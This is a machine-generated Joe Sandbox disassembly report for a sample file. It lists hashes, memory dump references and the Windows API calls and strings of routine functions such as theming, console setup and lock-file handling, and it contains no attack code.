                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb75edc9d9c2af6d561dd179a574316058f1093738e3d2fb34d0524fe001567d
                                                                                                            • Instruction ID: d8d719f39aa95c139ad3b9a1872d5b9cca955a3ba708f4803b2b728ff233d3b0
                                                                                                            • Opcode Fuzzy Hash: bb75edc9d9c2af6d561dd179a574316058f1093738e3d2fb34d0524fe001567d
                                                                                                            • Instruction Fuzzy Hash: 47D0C9B0A08380AAE30ACB1CC440E52B7E0AF65718F1496C8E9889B212E736DD92C750
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d3a21c7fb3c389693e3ab682d91a6c31bbc582a71fd63ee339bd5b52e8c025c7
                                                                                                            • Instruction ID: 85e853eab695f5960a06e3c6503bf5634bdb23a5a60d9f19c7eebb2c323ef4ca
                                                                                                            • Opcode Fuzzy Hash: d3a21c7fb3c389693e3ab682d91a6c31bbc582a71fd63ee339bd5b52e8c025c7
                                                                                                            • Instruction Fuzzy Hash: 04B092B1D087808AD306CF0CC040C55B3A0AFA5B10F11E684ADC86B222E735DD81C660
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 039d4416c18888f9baa381718c49933f03675b08b4cd88415358f1d66509cd3f
                                                                                                            • Instruction ID: a394edd02ba77224719b5de31c15850dbd8d768aa3a3717acdd231e3b2eceb96
                                                                                                            • Opcode Fuzzy Hash: 039d4416c18888f9baa381718c49933f03675b08b4cd88415358f1d66509cd3f
                                                                                                            • Instruction Fuzzy Hash: 64B092F19087808BD70ACF0CC040C95B3A0BFA5B00F21EA85EDC06B212E734DD42C620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a09fb63f4bcff788b9cecb4f12ed996b04e5336b2a2c2a004e83f22e513e8c24
                                                                                                            • Instruction ID: 2148c15d917159411ab0046655487392d78a96ea7a4d7daa49ebdd6fcff50681
                                                                                                            • Opcode Fuzzy Hash: a09fb63f4bcff788b9cecb4f12ed996b04e5336b2a2c2a004e83f22e513e8c24
                                                                                                            • Instruction Fuzzy Hash: C6B012B1D0C7808AD3028B1CC000C55B3A0BFE1B00F10F744EDC029101E7348D41C210

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 307 ad6a00-ad6a0a 308 ad6a0c-ad6a1a 307->308 309 ad6a1b-ad6a65 call f80d70 call f7d860 307->309 314 ad6a7c-ad6a86 call f7bb90 309->314 315 ad6a67-ad6a69 309->315 316 ad6a89-ad6aa8 call f87c00 call 1062600 314->316 315->316 317 ad6a6b-ad6a76 315->317 325 ad6aae-ad6ac1 GetProcAddress 316->325 326 ad6cc5 316->326 317->316 321 ad6a78 317->321 321->314 325->326 328 ad6ac7-ad6cac call a5a240 * 25 call f718f0 325->328 327 ad6cc7-ad6ccf 326->327 329 ad6ce6-ad6cf0 call f7bb90 327->329 330 ad6cd1-ad6cd4 327->330 388 ad6cae-ad6cbc call a5a240 328->388 389 ad6cc1-ad6cc3 328->389 333 ad6cf3-ad6cfa 329->333 332 ad6cd6-ad6ce0 330->332 330->333 332->333 336 ad6ce2 332->336 336->329 388->389 389->327
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00AD6AB4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeBackgroundEx$GetCurrentThemeName$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeTransitionDuration$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$OpenThemeData$SetWindowTheme$uxtheme
                                                                                                            • API String ID: 190572456-2126022697
                                                                                                            • Opcode ID: f16b64371a3cb2b49485af529002b3c07e439d42858c9f67aadbd7f2051e1651
                                                                                                            • Instruction ID: 907b4e13e05403637b582b4b08ad49114244c15f293be2aad2ed1b39d4d5726a
                                                                                                            • Opcode Fuzzy Hash: f16b64371a3cb2b49485af529002b3c07e439d42858c9f67aadbd7f2051e1651
                                                                                                            • Instruction Fuzzy Hash: A0718DB4A183419FCB14EF22D55BAA97BA0FB50304F810D1EF86257295EB78A14CCB63

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000001), ref: 00783761
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0078376E
                                                                                                            • GetStdHandle.KERNEL32(000000F4,?), ref: 0078377D
                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0078378A
                                                                                                              • Part of subcall function 00773C20: __CxxThrowException@8.LIBCMT ref: 00773CD0
                                                                                                            • AttachConsole.KERNEL32(000000FF,?), ref: 007837A4
                                                                                                            • AllocConsole.KERNEL32 ref: 007837B5
                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 007837BD
                                                                                                            • GetLargestConsoleWindowSize.KERNEL32(00000000), ref: 007837C7
                                                                                                            • SetConsoleScreenBufferSize.KERNEL32(00000000,000000FD), ref: 007837E6
                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 007837EE
                                                                                                            • SetConsoleMode.KERNEL32(00000000,000000E0), ref: 007837FB
                                                                                                            • GetConsoleWindow.KERNEL32(00000000), ref: 00783809
                                                                                                            • GetSystemMenu.USER32(00000000), ref: 0078380C
                                                                                                            • RemoveMenu.USER32(00000000,0000F060,00000000), ref: 0078381E
                                                                                                            • GetConsoleWindow.KERNEL32 ref: 00783824
                                                                                                            • DrawMenuBar.USER32(00000000), ref: 00783827
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$Handle$MenuWindow$FileSizeType$AllocAttachBufferDrawException@8LargestModeRemoveScreenSystemThrow
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 384796557-3130406586
                                                                                                            • Opcode ID: f39550b3398394a04f2aa3e98f9a3476d8e9d87080434d3e3959c879f168e50b
                                                                                                            • Instruction ID: e5a3fb1053bfa36443d6648e5692137faa1dd9a4e26193ecdc50826eb59f38c0
                                                                                                            • Opcode Fuzzy Hash: f39550b3398394a04f2aa3e98f9a3476d8e9d87080434d3e3959c879f168e50b
                                                                                                            • Instruction Fuzzy Hash: 6161E170244301DFD720EF39CC89B1A7BE5AF44B28F14496CF52ADB2D2E679E9498B11
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000000,04000102,00000000,?), ref: 00864765
                                                                                                            • GetLastError.KERNEL32 ref: 008647B3
                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000,?,?,?,00000000,?), ref: 00864906
                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,01146788), ref: 00864914
                                                                                                            • FlushFileBuffers.KERNEL32(000000FF,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 008649F5
                                                                                                            • LockFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00864A1B
                                                                                                            • GetLastError.KERNEL32 ref: 00864A38
                                                                                                              • Part of subcall function 00787E30: FormatMessageW.KERNEL32(?,?,?,?,00001100,00000000,?,00000400,EA29BAA6,00000000,00000000), ref: 00787E9A
                                                                                                              • Part of subcall function 00787E30: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00787EF0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ErrorLast$BuffersCreateFlushFormatFreeLocalLockMessageWrite
                                                                                                            • String ID: Could not create lock file '%1': %2$Could not obtain the lock for file '%1': %2$Could not write PID to lock file '%1': %2$KDLockFile
                                                                                                            • API String ID: 2860360726-138458727
                                                                                                            • Opcode ID: 7811eca3176394eb81211ca31c9a470d4168b360f0dfd9f7a75657c2e1025b69
                                                                                                            • Instruction ID: 2d11fc62487b95510fe4f84816f78bad7717e96bd12ac581093cd037f1a046f7
                                                                                                            • Opcode Fuzzy Hash: 7811eca3176394eb81211ca31c9a470d4168b360f0dfd9f7a75657c2e1025b69
                                                                                                            • Instruction Fuzzy Hash: A2D1FD70244340ABDB28DF68DC46B6E77E5FF86324F05461CF9969B2D1DB3898098B62
                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 0110679F
                                                                                                              • Part of subcall function 0110616F: __getptd_noexit.LIBCMT ref: 0110616F
                                                                                                            • __gmtime64_s.LIBCMT ref: 01106838
                                                                                                            • __gmtime64_s.LIBCMT ref: 0110686E
                                                                                                            • __gmtime64_s.LIBCMT ref: 0110688B
                                                                                                            • __allrem.LIBCMT ref: 011068E1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011068FD
                                                                                                            • __allrem.LIBCMT ref: 01106914
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01106932
                                                                                                            • __allrem.LIBCMT ref: 01106949
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01106967
                                                                                                            • __invoke_watson.LIBCMT ref: 011069D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 384356119-0
                                                                                                            • Opcode ID: 11baaac1f3b7902e441adeb9e22613c70f70be0ca0d93870b529a96d2de4584f
                                                                                                            • Instruction ID: ec009a05809543d28216e85685932d4ea00224a16f210aa6f5606b1778548fe0
                                                                                                            • Opcode Fuzzy Hash: 11baaac1f3b7902e441adeb9e22613c70f70be0ca0d93870b529a96d2de4584f
                                                                                                            • Instruction Fuzzy Hash: 3771B771E00B17AFD71E9A6CCC40B9AB7A8AF54224F14422AE514D76C1F7F1E960C7D0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: SHGetKnownFolderPath$shell32
                                                                                                            • API String ID: 0-1045111711
                                                                                                            • Opcode ID: 33c367f0ea2bf2dcdcc3123c80c2f13ab64d3a712bc25868abe04bdbdd6de7d1
                                                                                                            • Instruction ID: 2d2ecd4f7676cb8c0b1c5d6fb73a5892c730b6d1389793707c9782147a4fed23
                                                                                                            • Opcode Fuzzy Hash: 33c367f0ea2bf2dcdcc3123c80c2f13ab64d3a712bc25868abe04bdbdd6de7d1
                                                                                                            • Instruction Fuzzy Hash: 43917D71249341DFD364DF64C845BABB7E8ABC9704F40482EF699CB281EB74D948CB62
                                                                                                            APIs
                                                                                                            • VerSetConditionMask.KERNEL32 ref: 00F701C4
                                                                                                            • VerSetConditionMask.KERNEL32 ref: 00F701CC
                                                                                                            • _memset.LIBCMT ref: 00F70209
                                                                                                            • VerifyVersionInfoW.KERNEL32(?,0000000A,00000000), ref: 00F70230
                                                                                                            • VerifyVersionInfoW.KERNEL32(?,0000000A,00000000), ref: 00F7024B
                                                                                                            • VerSetConditionMask.KERNEL32 ref: 00F7026E
                                                                                                            • VerSetConditionMask.KERNEL32 ref: 00F70276
                                                                                                            • VerSetConditionMask.KERNEL32 ref: 00F7027E
                                                                                                            • VerifyVersionInfoW.KERNEL32(?,0000000B,00000000), ref: 00F7028D
                                                                                                            • VerifyVersionInfoW.KERNEL32(?,0000000B,00000000), ref: 00F702A8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConditionMask$InfoVerifyVersion$_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2636853281-0
                                                                                                            • Opcode ID: fbb40cb443b62ef76b6fe11cfc7c183a3fd50678cfabd96f63920300b1c2c469
                                                                                                            • Instruction ID: 500512bfa541b667bd6a7fb12fac19a736dcf953291c7d814a33db3256bacde1
